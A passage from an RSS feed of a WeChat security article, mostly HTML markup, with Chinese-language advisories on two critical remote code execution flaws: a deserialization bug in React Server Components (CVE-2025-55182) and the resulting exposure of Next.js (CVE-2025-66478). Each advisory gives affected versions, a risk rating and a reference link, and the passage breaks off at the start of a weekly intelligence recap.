0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="9 12 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Next.js 远程代码执行漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-66478）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 76, 65);">严重</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="color: rgb(0, 82, 255);font-size: 14px;background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf=""><a href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components" target="_blank">https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Next.js 是一个基于 React 的流行 Web 应用框架，广泛用于构建现代化、可扩展的全栈应用。由于 React Server Components (RSC) 存在反序列化漏洞（CVE-2025-55182），依赖该组件的 Next.js 框架同样受到影响。攻击者可以通过构造恶意请求触发该漏洞，从而导致远程代码执行。</span></p></div></div></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">React Server Components 远程代码执行漏洞(CVE-2025-55182)</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 76, 65);">严重</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components" target="_blank">https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components</a></span></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">React Server Components（RSC）是React 18引入的一种新范式，它允许组件在服务器端专门运行，将渲染后的UI描述（而非组件代码本身）发送到客户端，从而显著减少客户端需要下载和执行的JavaScript体积，提升加载性能，并允许组件直接访问服务器端资源（如数据库或文件系统），但无法使用状态、副作用等客户端交互特性。React Server Components 19.0.0、19.1.0、19.1.1 和 19.2.0 版本存在预身份验证远程代码执行漏洞，涉及以下软件包：react-server-dom-parcel、react-server-dom-turbopack 和 react-server-dom-webpack。该漏洞利用的代码会不安全地反序列化发送到服务器函数端点的 HTTP 请求的有效负载，攻击者可以通过发送特制请求触发反序列化，最终远程执行任意代码。</span></p></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247510979">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a2907a6f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247510979%26idx%3D1%26sn%3D45ad388685922de5e555ad65bb5cc401">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 08 Dec 2025 16:30:00 +0800</pubDate>
    </item>
    <item>
      <title>情报每周回顾 2025-12-01</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247510975&amp;idx=1&amp;sn=27789bf6e0651802ecc7b2c609e15c62</link>
      <description></description>
      <content:encoded><![CDATA[<p>
<span>腾讯威胁情报中心</span> <span>2025-12-01 16:30</span> <span style="display: inline-block;">北京</span>
</p>




<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c8b94799&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6AoQM3RKCWXia1xKyza7Ss8zBicD2yNRmw9icYzd75vXsxribMKvpTsLicwAvpbtY7GAJzfjISjhtBz2BUsELR8zkXw%2F0%3Fwx_fmt%3Djpeg"/></p>


<div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="template" mpa-from-tpl="t" data-mpa-action-id="md8hqhg218sw"><div data-mpa-template="t" mpa-from-tpl="t"><div data-mpa-category="模板" data-mpa-template-rows="1" yb-mpa-mark="mark-header" style="width: 100%;" data-mid="" data-mpa-template="t" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;z-index: 1;padding: 0 5px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;padding: 17px 10px 14px 10px;background: #FFFFFF;box-shadow: 0px 2px 4px 0px rgba(60, 131, 250, 0.15);" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;align-items: flex-end;justify-content: space-between;padding: 0 0 3px 0;border-bottom: 1.3px dashed rgba(60, 131, 250, 0.3);" data-mid="" mpa-from-tpl="t"><p style="width: 47px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 0 0 2px 0;flex-shrink: 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050100" class="rich_pages wxw-img" data-ratio="0.19148936170212766" data-w="94" src="https://wechat2rss.xlab.app/img-proxy/?k=0e691e32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FHm2rIuksic6yohBk0Kia6W2Hhud1zoaEKFP2yZP0QHMxOicJykLUjiaiayTcgicdqhq5HURXYibhM3y7fMIZHZhMWn5ng%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 12px;color: rgba(60, 131, 250, 0.6);line-height: 17px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="">腾讯云安全威胁情报中心</span></p></div></div><div style="width: 100%;padding: 14px 0 10px 0;display: flex;align-items: flex-start;justify-content: space-between;border-bottom: 1.3px dashed rgba(60, 131, 250, 0.3);" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p yb-mpa-mark="mark-header-title" style="font-weight: bold;font-size: 54px;color: #3C83FA;line-height: 55px;letter-spacing: 3px;word-break: break-word;" data-mid=""><span leaf="">摘要概览</span></p></div><div style="flex-shrink: 0;background: #3C83FA;width: 79px;padding: 3px 0 5px 0;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 16px;color: #FFFFFF;line-height: 20px;word-break: break-word;" data-mid=""><span 